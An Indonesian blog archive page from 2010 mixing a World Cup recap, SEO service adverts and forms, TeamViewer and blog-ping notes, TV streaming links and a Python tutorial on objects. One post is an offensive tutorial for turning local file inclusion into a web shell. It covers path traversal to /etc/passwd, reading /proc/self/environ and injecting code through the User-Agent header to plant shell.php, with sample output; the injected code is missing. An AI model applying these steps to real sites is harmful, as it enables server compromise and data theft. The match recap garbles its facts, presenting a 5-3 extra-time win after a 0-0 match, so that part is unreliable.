Rabu, 30 Juni 2010

Paraguay vs Japan World Cup Highlights by Sports Betting: The 2010 World Cup round 16 soccer match between Paraguay and Japan was kicked off on yesterday, i.e. on June 29, 2010 at Loftus Versefeld Stadium, Pretoria. In this match, Paraguay defeated Japan by 5-3. With this win, Paraguay secured their berth in quarter finals.

Betting

This is the first time in Paraguay’s history that their reach to the quarter finals. Paraguay and Japan were 0-0 at the end of the match, but in order to select the quarter finals, an extra time allotted for them. In the extra time, Paraguay had taken the chance and defeated Japan. Paraguay’s Nestor Valdez did the best in the extra time.

Finally, Paraguay reached the quarter finals by defeating Japan with 5-3. In their quarter finals, Paraguay will play against Spain.

2010 World Cup Paraguay vs Japan Highlights by Sports :Viandraminerva

Selasa, 29 Juni 2010

Senin, 28 Juni 2010


Udah Lama Nich Viandraminerva tidak Posting, tutorial hacking kali ini saya akan coba mengimplementasikan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ, hal ini telah dibahas sebelumnya di website milw0rm pada paper ke 361.
Ok kita langsung saja...

1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan LFI.

contoh : http://site.com/info.php?file=news.php

2. coba kita ganti "news.php" dengan "../../../".

contoh : http://site.com/info.php?file=../../../

lalu kita mendapat error, seperti berikut...

Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.

contoh : http://site.com/info.php?file=etc/passwd
Tetapi kita masih mendapat error seperti berikut :

Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

bagaimana jika kita naikan directorynya ?
mari kita coba...

contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd

Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin

3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti "/etc/passwd" dengan "/proc/self/environ"

contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ

Jika anda mendapatkan yang seperti ini :

DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80

Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD

4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi "http://site.com/info.php?file=../../../../../../../../../proc/self/environ"
lalu pada user-agent isikan dengan kode berikut :



atau



lalu submit.

5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.

http://www.site.com/shell.php

happy hacking !

Minggu, 27 Juni 2010

  1. Apakah anda mempunyai produk yang bagus, istimewa, layak dikonsumsi banyak orang di seluruh penjuru dunia?
  2. Apakah anda sudah menghabiskan banyak biaya untuk pemasaran?
  3. Apakah pemasaran anda tidak tepat sasaran?
  4. Apakan anda sudah mencoba membuat website untuk pemasaran online anda?
  5. Apakah ternyata website yang anda buat tidak banyak pengunjungnya?
  6. Apakah anda berfikir ternyata website online anda sia-sia, dan anda rugi?

Jika anda mengalami masalah seperti di atas, kami adalah partner terbaik buat anda. Kami akan membantu membuat produk anda dikenal banyak orang dan tentunya dikenal orang yang tepat atau disebut calon pembeli.

Kami akan membantu anda dengan Pemasaran Online, Jasa Pemasaran melalui internet tepatnya melalui google.

A : Mengapa pemasaran online?
B : Karena pengguna internet semakin hari semakin bertambah, dengan pasar yang sangat luas.

A : Mengapa Google?
B : Karena 80% pengguna internet memulai melakukan pencarian dengan mesin pencari google.

A : Bagaimana cara kerjanya?
B : Kami akan menempatkan website anda di halaman pertama google dengan kata kunci tertentu.

A : Mengapa harus menggunakan kata kunci tertentu?
B : Agar iklan/website anda dikunjungi oleh orang yang tepat, sehingga pemasaran anda lebih efektif. Contoh : website anda bisa di halaman pertama google dengan kata kunci JUAL ANGGREK, maka pengunjung yang datang ke website anda adalah orang yang ingin membeli anggrek, sehingga kemungkinan produk anda terjual jauh lebih besar daripada anda menyebar brosur ke banyak orang yang belum tentu membutuhkan anggrek.

A : Apa syarat agar saya bisa menikmati layanan Jasa Pemasaran ini
B : Syarat utama adalah anda harus mempunyai produk dan juga website, jika anda belum mempunyai website kami bisa membantu membuatkannya untuk anda.

A : Berapa biaya yang harus saya keluarkan untuk Jasa Pemasaran ini?
B : Detail biaya bisa anda lihat di Jasa SEO dan untuk pembuatan website bisa anda lihat di Website Gratis

Info : 021-97869511 (Viandra)

Jasa Pembuatan Website SEO merupakan jasa pembuatan website dengan tujuan agar website mudah dikenali oleh mesin pencari sehingga bisa meningkatkan jumlah pengunjung tanpa harus memasang iklan Link Di website lain.

Berikut detail Jasa Pembuatan Website SEO

1. Desain menarik
Kami tidak melayani pembuatan website dengan banyak gambar maupun flash karena akan berdampak negatif untuk mesin pencari, desain menarik dalam arti bahwa desain yang kami buat dapat membuat pengunjung betah untuk berlama-lama di website anda
2. Optimasi SEO setiap halaman website
Kami melakukan Optimasi SEO untuk setiap halaman sehingga setiap halaman yang ada di website anda akan lebih mudah ditemukan oleh pengunjung

Biaya

1. Biaya Jasa Pembuatan Website SEO sebesar Rp. 2.000.000/tahun untuk tahun pertama (sudah termasuk domain, hosting dan Optimasi SEO halaman web)
2. Sebesar Rp. 500.000/tahun untuk tahun ke 2 dan selanjutnya

Form Pemesanan Website


Nama :*
Nama Webite (yang diinginkan)*
Email*
No.Telepon*
Alamat Lengkap:*
Image Verification
captcha
Masukan Captcha di samping:
[Refresh Image][]

Kamis, 24 Juni 2010


Kesulitan terbesar pada konfigurasi akses DVR via Internet adalah bagaimana meloloskan Port. Artinya, kita perlu melakukan beberapa setting pada modem Speedy (ADSL) yang terhubung dengan DVR dan PC laptop kita dalam satu jaringan lokal (LAN). Masalah ini kerap menimpa pemula seperti halnya kami. Dalam menghadapi situasi seperti itu sendirian adakalanya kita sangat memerlukan bantuan seseorang yang lebih mengerti soal ini. Namun untuk mendatangkannya ke lokasi diperlukan waktu (dan belum tentu ia bersedia datang saat itu juga). Memang kita bisa melakukan percakapan via handphone ataupun sms dengan yang bersangkutan. Hanya terkadang cara ini tidak efektif. Selain banyak menghabiskan pulsa, mengetik teks sms berulang kali tentunya sangat melelahkan. Lalu bagaimanakah solusi yang sangat rasional dalam menghadapi situasi seperti ini? Jawabannya: manfaatkanlah Team Viewer!

Pada posting berikut insya Allah kami akan jelaskan sedikit bagaimana cara melakukan koneksi dengan komputer lawan padahal dia belum meng-install software ini. Mungkin anda mau "mengotak-atik" software ini dari sekarang?

Team Viewer adalah software gratis (freeware) dari TeamViewer GmbH. Software ini adalah PC remote desktop, yang berfungsi untuk mengoperasikan komputer lain dari komputer kita. Uniknya, software ini sangat mudah di-install tanpa perlu prosedur rumit dan hebatnya lagi bisa langsung "konek" (connect). Bagi yang ingin mencoba silakan download dulu softwarenya di sini atau di link download lain favorit anda. Saat tulisan ini dibuat, versi terbarunya adalah versi 5.0.8421. Setelah download selesai, lakukanlah instalasi software seperti biasa sampai aplikasi ini bisa dijalankan, ditandai dengan tulisan Ready to connect (secure connection) di pojok kiri bawah.
My Page Rank
Submit Free lets you submit your URL to 20 popular search engines from one MyPagerank.Net Google PageRank Checker - Check Google page rank
Webmasters, monitor your webpage pagerank
Pingler.com
Blog and Ping Tool - Use Pingler.com to Drive Traffic your Blogs and Websites
Use Pingler.com to Ping your Blogs and Websites in the best way possible!
Ping-o-Matic!
Ping-O-Matic is a service to update different search engines that your blog has updated.
PingMyBlog.com
PingMyBlog.com is a service which does the hard work for you. We notify all the major blog directories in one go so that everyone knows about your latest blogs.

It will not work for some reason if you use the RSS field provided. It does work just fine if you only use the Name and URL fields only.
Autopinger
Automates Ping Blog and Podcast for Free
Feed Shark
Ping your blog, feed, or podcast for free!
Pingates
Blog pinger - Blog ping service
Pingates is a service that pings or notifies a number of services that keep track of weblogs and publish them.
PING.IN
Blog and ping , Blog ping , ping , Blog Search , Speed Test , Rank
Feed Ping
Free Website and Blog Multiple Submission Service - FEED PING Website and Blog Multiple Feed Service
King Ping Your Blog
Update pinging services to get the best results from all the important search engines. It is all automatic, so set it up and forget about it.
Ping 4 Free: Free Blog Ping Service
This site offers a blog ping service that pings well over 100 tested and functioning blog directories (actually 133 at last update). You must register, but registration is totally free.
Syncr Ping Service
Syncr is a Service to Update Different Search Engines That Your Blog or Web Site Has Updated.
Pingoat
Ping over fifty blog services instantly. Pingoat also has an XML-RPC server. Ping services like Technorati, newsgator,feedster..




Other search engines and directories

You can't instantly submit your site to the below search engines and directories.
Check the desired search engines and directories, and click the Go! button.


Search Engines






MSNtyBitYahoo! Search*

Your browser will show you search engines' "Add URL" pages, each in a separate window.
Fill in the forms and submit them in each window.


Directories







Open DirectoryYahoo!LookSmart**Zeal

There is no direct way to submit your site to these directories. So, if you
check them, the browser will show you the pages describing how to submit your site to the
corresponding directories.




* Yahoo! offers both free submission and paid inclusion. The free submission program
(requires registration) doesn't guarantee when, how often and how deep your site will be indexed.
The paid inclusion program guarantees inclusion in the index, frequent refresh,
quality review and consultation.


Minggu, 20 Juni 2010

LATAR BELAKANG
Di dalam era teknologi informasi ini, internet telah menjadi jembatan yang sangat penting dalam meningkatkan kinerja perusahaan. Perusahaan yang mampu memaksimalkan kekuatan dari teknologi internet mempunyai peluang meningkatkan kinerja perusahaan antara lain meningkatkan citra perusahaan, membuat peluang baru dalam pemasaran dan juga meningkatkan pelayanan kepada pelanggan.
Viandraminerva memahami hal ini dan menyediakan layanan yang memungkinkan hal-hal di atas dapat dilakukan. Master SEO Viandra memberikan layanan mulai dari email untuk pelanggan, pembuatan aplikasi berbasis web untuk peningkatan kinerja perusahaan, pembuatan website untuk meningkatkan citra perusahaan dan internet marketing untuk membuka peluang baru dalam meningkatkan pendapatan perusahaan.

Master SEO Viandra selalu melakukan riset dalam memberikan layanan terbaik dari setiap aspek. Dengan pengalaman sejak tahun 2002, Master SEO Viandra siap membantu anda meningkatkan kinerja perusahaan dengan memaksimalkan kekuatan teknologi internet terutama dalam website perusahaan.

FOKUS LAYANAN
Viandraminerva Indonesia fokus kepada 5 layanan

1. Corporate web development
Viandraminerva memahami bahwa citra perusahaan perlu ditampilkan secara baik melalui internet. Team Viandraminerva berusaha menangkap citra perusahaan dan menuangkannya dalam web design.
Dalam kemudahan mengupdate isi website, kami telah mengembangkan CMS (Content Management System).

2. Internet Marketing
Untuk membuka peluang pemasaran melalui media internet, kami menyediakan layanan internet marketing. Dengan layanan ini, pelanggan akan mendapatkan prospek-prospek baru yang dijangkau melalui melalui media internet.

3. Web application
Untuk meningkatkan kinerja internal perusahaan, Viandraminerva menyediakan aplikasi berbasis web untuk mengoptimalkan sumber daya yang dimiliki pelanggan.

4.Jasa SEO murah Dan Bergaransi
Anda Pasti Tidak akn kecewa karena Dengan waktu yang relatif cepat Website anda Akan mampu bersaing dengan para kompetitor SERP Google Dan Top Rangking

5.Konsultan SEO terhandal
Selama masa Optimasi Berlangsung Kami akan Memberikan konsultasi-konsultasi Interaktif Sehingga anda dapat menilai cara Kerja optimasi SEO yang kami berikan.

Dengan 5 fokus layanan tersebut, Master SEO Viandra berharap pelaku bisnis di Indonesia dapat menggunakan teknologi internet untuk meningkatkan kinerja perusahaan, meningkatkan citra baik perusahaan dan lebih dapat menjangkau prospek-prospek baru untuk meningkatkan penjualan.


Master SEO Viandra

Jl.H.Saili gg.Pandan I no:52
Jakarta Barat 11480
Tlp : 021-97869511, 0857-1679-7884
www.viandraminerva.co.cc


ISI FORM INI UNTUK MENGHUBUNGI VIA EMAIL



Nama :*
Email :*
Telepon :*
Pesan :*
Image Verification
captcha
Please enter the text from the image:
[Refresh Image][]

Sabtu, 19 Juni 2010




Nama Lengkap :*
Nama Perusahaan :*
Email :*
No Telepon :*
Website Yang Diinginkan :
Domain Website
Deskripsi Website :*
Budget Anda*
< 5 Juta 
5 - 10 Juta 
10 < 20 Juta 
Image Verification
captcha
Silahkan Masukan Text Di Form ini:
[Refresh Image][What's This?]

Pembayaran :
#Harga <> Rp 10.000.000
Pembayaran 20% - 30% di muka
# Harga Rp 5.000.000 s/d Rp 10.000.000
Pembayaran 50% di muka
# Harga > Rp 10.000.000
Pembayaran 20% - 30% di muka



Jumat, 18 Juni 2010

LIVE TV STREAMING DAAI Tv
LIVE TV STREAMING BaliTV


PERHATIAN:
Untuk menonton Acara ini Pastikan Browser anda telah terinstall Adobe Flashplayer
Kalo belum Terinstall bisa Download di sini
LIVE TV STREAMING METRO TV
LIVE TV STREAMING CTv BANTEN
LIVE TV STREAMING JAK TV

LIVE TV STREAMING INDONESIA







LIVE TV STREAMING SPACE TOON

Powered by www.indoweb.tv
LIVE TV STREAMING ANTV

LIVE TV STREAMING TVONE

Powered by TV ONE
LIVE TV STREAMING RCTI

Powered by www.Viandraminerva.co.cc
BBC SPORT

ALL MUSIC USA
TRI TV FROM INDONESIA

Kamis, 17 Juni 2010

Karena ada rekan blogger yang Requet tentang tutorial python,saya akhirnya ingin membagi ilmu buat rekan-rekan yang masih awam tentang bahasa program ini,Bagian tutorial kali ini akan membahas masalah seputar objek.

Objek

Python tentu saja mendukung pemrograman berorientasi objek. Bahkan, nyaris segala sesuatu di Python���mulai dari string, angka, fungsi���adalah objek. Apakah objek itu? Objek adalah sesuatu yang menampung nilai/data dan dapat kita kenakan operasi tertentu. Di dunia nyata ini, banyak hal yang bisa kita sebut objek. Buku misalnya, merupakan objek karena menampung informasi dan dapat kita baca (kenakan operasi baca) atau tulis (kenakan operasi tulis). Sepeda, binatang, manusia, semua juga bisa disebut objek.

>>> "aku seorang kapiten".split(" ")
['aku', 'seorang', 'kapiten']

Pada contoh di atas, kita membuat objek string bernilai ���aku seorang kapiten��� lalu mengenakan operasi split() pada objek string tersebut, yaitu dengan sintaks titik diikuti oleh nama operasi (yang disebut metode objek). Hasilnya adalah sebuah list���yang merupakan objek juga. List ini berisi 3 elemen, masing-masing elemennya adalah string yang telah dipecah (yang, lagi-lagi, merupakan objek pula). Sehingga lewat operasi split() kita telah menciptakan empat objek baru, sebuah list dan tiga buah string.

Catatan: Perhatikan bahwa kode di atas hanya akan berjalan di Python versi 2 ke atas. Di versi 1.5.2 dan sebelumnya, Python belumlah ���semurni��� sekarang, dan belum memperlakukan tiap jenis objek secara konsisten. Untuk contoh selanjutnya, diasumsikan Anda telah menggunakan Python 2.

>>> kata = "aku seorang kapiten".split(" ")
>>> kata.append("mempunyai")
>>> kata.append("pedang")
>>> kata.append("panjang")
>>> kata
['aku', 'seorang', 'kapiten', 'mempunyai', 'pedang', 'panjang']
>>> kata.sort()
>>> kata
['aku', 'kapiten', 'mempunyai', 'panjang', 'pedang', 'seorang']

Pada contoh di atas, kita mula-memberi nama objek list hasil split()dengan variabel kata. Kita lalu mengenakan operasi append() pada kata. Operasi append() adalah operasi pada objek list yang berguna untuk menambah satu elemen di akhir list. Setelah tiga kali menambah elemen, kita meminta Python mencetak isi objek list kita. Setelah itu kita mengenakan lagi operasi sort() pada objek kita. Hasilnya adalah keenam kata yang telah diurutkan secara alfabetis.

Memberi nilai dan mengenakan operasi pada objek di Python mudah bukan? Apakah ada jenis objek lain selain string dan list? Tentu saja. Dictionary, float (bilangan desimal), dan int (bilangan bulat) semuanya adalah objek. Perhatikan contoh-contoh berikut:

>>> {'tomi':'taurus', 'vira':'virgo', 'santi':'sagitarius'}.keys()
['tomi', 'vira', 'santi']
>>> {'tomi':'taurus', 'vira':'virgo', 'santi':'sagitarius'}.values()
['taurus', 'virgo', 'sagitarius']
>>> (-1.3).__abs__()
1.3

Perhatikan bahwa pada kasus terakhir, kita perlu memberi tanda kurung dulu sebelum memberi titik dan nama operasi, agar parser Python tidak kebingungan���ingat bahwa sebuah bilangan desimal juga dapat mengandung karakter titik. Contoh terakhir juga dapat ditulis secara ���non-OO��� yaitu abs(-1.3) dan akan memberi hasil yang sama.
Refleksi: Fungsi dir()

Kalau Anda menjumpai sebuah objek, bagaimana kita tahu apa saja yang kita bisa lakukan terhadapnya? Dengan kata lain, operasi apa saja yang berlaku untuk objek tersebut? Kalau Anda sedang memakai bahasa level rendah seperti C++ maka jawabannya barangkali: teliti source codenya untuk mengetahui ini objek jenis apa, lalu teliti source code lagi untuk mengetahui definisi objeknya atau baca manual untuk mengetahui daftar metode untuk jenis objek yang dimaksud. Tapi di bahasa level tinggi seperti Python (atau Ruby atau Smalltalk), ada cara yang jauh lebih mudah: bertanyalah langsung. Bahasa-bahasa ini sangat terbuka dan mengizinkan kita mengintip ke dalam tiap objek untuk mengetahui isi perutnya. Istilah yang umum dipakai untuk urusan intip-mengintip ini adalah refleksi���yang berarti melihat bayangan diri sendiri, seperti melihat di cermin. Mari kita lihat seperti apa kemampuan refleksi di Python.

Fungsi yang perlu Anda ketahui paling pertama yaitu dir(). Fungsi dir() akan mengambil informasi dari objek dan memberitahu kita daftar atribut/operasi yang tersedia untuk suatu objek. Contoh:

>>> dir("")
['__add__', '__class__', '__contains__', '__delattr__', '__doc__', '__eq__',
'__ge__','__getattribute__', '__getitem__', '__getslice__', '__gt__',
'__hash__', '__init__', '__le__', '__len__', '__lt__', '__mul__', '__ne__',
'__new__', '__reduce__', '__repr__', '__rmul__', '__setattr__', '__str__',
'capitalize', 'center', 'count', 'decode', 'encode', 'endswith',
'expandtabs', 'find', 'index', 'isalnum', 'isalpha', 'isdigit', 'islower',
'isspace', 'istitle', 'isupper', 'join', 'ljust', 'lower', 'lstrip',
'replace', 'rfind', 'rindex', 'rjust', 'rstrip', 'split', 'splitlines',
'startswith', 'strip', 'swapcase', 'title', 'translate', 'upper']

Pada contoh di atas kita bertanya pada Python, objek string ("") itu mengandung atribut/mendukung operasi apa saja? dir() akan mengembalikan list berisi informasi yang dimaksud. Hm, ada upper() dan lower(). Mari kita coba.

>>> "Prok, Prok, Prok!".upper()
'PROK, PROK, PROK!'
>>> "Prok, Prok, Prok!".lower()
'prok, prok, prok!'

Mudah sekali bukan? Kita tidak perlu melihat manual untuk mengetahui bagaimana cara mengkonversi sebuah string menjadi huruf kapital atau huruf kecil. Cukup buatlah objek, menanyakan jenis-jenis operasi pada Python, lalu memanggil metode yang sesuai.

Tapi tentu tidak semua semudah itu. Beberapa operasi/metode membutuhkan argumen. Bagaimana kita mengetahui sintaks setiap operasi?

Lagi-lagi refleksi Python membantu. Kita dapat mengintip atribut __doc__ sebuah objek untuk mengetahui keterangan singkat mengenai objek tersebut. Rata-rata objek memiliki atribut __doc__ yang disebut docstring ini. Misalnya,

>>> "tes".replace.__doc__
'S.replace (old, new[, maxsplit]) -> string\n\nReturn a copy of string S with
all occurrences of substring\nold replaced by new. If the optional argument
maxsplit is\ngiven, only the first maxsplit occurrences are replaced.'

Pada contoh di atas, kita ingin mengetahui sintaks metode replace() pada objek string. Perhatikan bahwa kita tidak menambahkan tanda kurung, (), setelah replace, menandakan bahwa kita bukan ingin memanggil metode objek replace() ini, melainkan mengambil atribut __doc__-nya. "tes" adalah sebuah objek berjenis string, dan "tes".replace adalah juga sebuah objek berjenis fungsi/metode. Jika kita menambahkan () setelah menyebutkan fungsi, maka kita mengenakan operasi memanggil atau mengeksekusi objek fungsi tersebut. Apakah "tes".replace.__doc__ sebuah objek juga? Ya, sebuah string.

Kembali ke __doc__. Sewaktu kita meminta nilai "tes".replace.__doc__ pada Python, Python memberikan nilai mentahnya. Buktinya, bisa Anda lihat kode escape \n yang terkandung di dalamnya. Bagaimana agar \n benar-benar tercetak sebagai newline? Mudah saja, print-lah docstring tersebut.

>>> print "tes".replace.__doc__
S.replace (old, new[, maxsplit]) -> string

Return a copy of string S with all occurrences of substring
old replaced by new. If the optional argument maxsplit is
given, only the first maxsplit occurrences are replaced.

Lebih enak dibaca bukan? Dari docstring ini kita mengetahui bahwa metode replace() membutuhkan dua atau tiga argumen. Argumen pertama, old, adalah string yang ingin diganti oleh argumen kedua, new. Sementara argumen ketiga yang bersifat opsional menyatakan jumlah penggantian maksimum yang boleh dilakukan. Mari praktikkan.

>>> "kadal".replace("l","k").replace("a","o")
'kodok'
>>> "kadal".replace("l","k").replace("a","o",1)
'kodak'

Contoh pertama mula-mula mengganti huruf ���l��� dengan huruf ���k��� pada objek string ���kadal���, sehingga menghasilkan objek string baru bernilai ���kadak���. Objek baru ini langsung dioperasi lagi dengan replace() kedua sehingga semua ���a���-nya menjadi ���o���. Sehingga hasil akhirnya menjadi ���kodok���. Contoh kedua sama, tapi menggunakan argumen ketiga pada replace() kedua.

Silakan Anda bermain-main dengan dir() dan mengintip apa saja yang bisa dilakukan terhadap objek-objek Python. Cobalah perintah-perintah berikut di interpreter interaktif Python dan telitilah lebih lanjut tiap atribut yang dikembalikan oleh dir(). Jika Anda butuh, cetaklah atribut __doc__-nya.

>>> dir(1)
>>> dir({})
>>> dir([])
>>> dir(None)
>>> dir(dir)
>>> import os
>>> dir(os)
>>> print os.rename.__doc__


>>> _

Kelas

Setelah puas bermain-main dengan objek yang ada di Python, Anda mungkin kini bertanya: bisakah saya membuat jenis objek saya sendiri? Jawabnya: tentu bisa, dengan bantuan objek khusus bernama kelas. Kelas adalah objek yang kita pakai untuk membuat objek lain. Kelas di Python didefinisikan dengan kata kunci class. Contoh definisi kelas paling sederhana:

class Titik:
pass

Kelas Titik kita adalah kelas kosong yang siap dipakai untuk membuat objek. Bagaimana cara membuat objek dari kelas? Jawabnya: dengan menggunakan (), dengan kata lain memanggil kelas tersebut.

titikku = Titik()

Maka jadilah sebuah objek kosong. Objek ini memiliki tipe Titik, dan disebut juga sebagai instans dari Titik. Cobalah mencetak nilainya di interpreter interaktif Python:

>>> titikku = Titik()
>>> titikku
<__main__.titik>

Python memberitahu bahwa titikku berisi objek yaitu instans dari kelas Titik. Apa yang bisa kita lakukan dengan objek ini? Kita bisa mengisinya dengan atribut atau nilai.

titikku.x = 5
titikku.y = 10

Objek titikku di sini dapat Anda pandang sebagai kantung atau namespace yang Anda isi dengan atribut-atribut bernama dan bernilai. Dan bisa juga Anda padang sebagai dictionary. Bahkan, sebetulnya, atribut-atribut ini memang disimpan oleh Python di sebuah atribut dictionary khusus bernama __dict__.
Refleksi: __dict__

Selain __doc__, ada satu atribut objek spesial lain yang disebut __dict__. __dict__ ini adalah sebuah dictionary yang dipakai Python untuk menyimpan daftar atribut pada objek bersangkutan. Objek-objek seperti modul dan instans kelas dapat Anda intip __dict__-nya untuk mengetahui atribut apa saja yang ada di dalamnya. Contoh:

>>> import os
>>> dir(os)
>>> print os.__dict__

Kalau Anda perhatikan keluarannya, maka dir() dan __dict__ akan memberikan hasil yang mirip-mirip.

Untuk apa __dict__? Dengan __dict__ kita dapat memanipulasi daftar atribut sebuah objek atau mengambil atribut sebuah objek secara dinamik. Contohnya:

>>> for cmd in ['setuid','open','stat']:
... print cmd
... print os.__dict__[cmd].__doc__
... print
...
setuid
setuid(uid) -> None
Set the current process's user id.

open
open(filename, flag [, mode=0777]) -> fd
Open a file (for low level IO).

stat
stat(path) -> (st_mode, st_ino, st_dev, st_nlink, st_uid, st_gid,
st_size, st_atime, st_mtime, st_ctime)
Perform a stat system call on the given path.

>>> _

Pada contoh di atas, kita mencetak docstring dari ketiga fungsi yang terdapat di modul os (yang telah kita import sebelumnya, tentu saja). Tapi alih-alih menggunakan sintaks os.open.__doc__, kita menggunakan os.__dict__['open'].__doc__. Keduanya setara, tapi dengan menggunakan dictionary __dict__, kita dapat menyebutkan atribut objek dengan nama variabel. Dengan __dict__ kita juga mencari sebuah atribut dari program kita. Bahkan kita dapat menghapus atribut objek dengan memanipulasi isi __dict__. Ingat, __dict__ adalah sebuah objek dictionary, dan kita bisa melakukan operasi sebagaimana kita memanipulasi sebuah dictionary biasa.

Kembali ke objek titikku kita sebelumnya:

>>> titikku = Titik()
>>> titikku.__dict__
{}

Saat pertama kita cetak, __dict__ dari objek titikku masih kosong karena belum ada atribut apa-apa pada objek kita tersebut. Tapi setelah kita melakukan:

>>> titikku.x = 5
>>> titikku.y = 10
>>> titikku.__dict__
{'y': 10, 'x': 5}

Maka __dict__ pun berisi atribut yang telah kita isikan sebelumnya. Jadi bisa Anda lihat bukan? Dengan mengintip atribut __dict__ pada sebuah objek instans kelas, kita dapat melakukan refleksi terhadap objek tersebut. Kita dapat mengetahui atribut-atribut apa yang terkandung dalam objek kita. Bahkan, seperti telah disebutkan sebelumnya, kita dapat menambah atau menghapus atribut objek lewat __dict__ ini.

>>> titikku.__dict__['x'] = 7
>>> titikku.x
7
>>> titikku.__dict__['z'] = -3
>>> titikku.z
-3
>>> del titikku.__dict__['y']
>>> titikku.__dict__
{'x': 7, 'z': -3}
>>> titikku.y
Traceback (most recent call last):
File "", line 1, in ?
AttributeError: Titik instance has no attribute 'y'
>>> _

Pada contoh di atas, kita menambahkan elemen ���z��� pada atribut __dict__ sehingga titikku.z dikenali. Lalu kita menghapus atribut ���y��� sehingga titikku tidak lagi memiliki atribut tersebut.

Mari kita kembali kepada dir(). Apa yang akan dilaporkan oleh dir() untuk objek titikku?

>>> dir(titikku)
['__doc__', '__module__', 'x', 'z']

Kenapa sudah ada dua atribut, __doc__ dan __module__, di situ? Padahal kita tidak pernah membuat atau mengisinya bukan? Ingat, atribut-atribut yang memiliki sintaks __NAMA__ adalah atribut spesial. __doc__, misalnya, sebetulnya diambil dari source code program. Coba cetak nilainya:

>>> titikku.__doc__
>>> _

Ternyata kosong. Tapi jika kita mendefinisikan kelas Titik seperti ini:

class Titik:
"Membuat sebuah objek titik."
pass

Maka jika kita membuat instans Titik lagi:

>>> titikku=Titik()
>>> titikku.__doc__
'Membuat sebuah objek titik.'

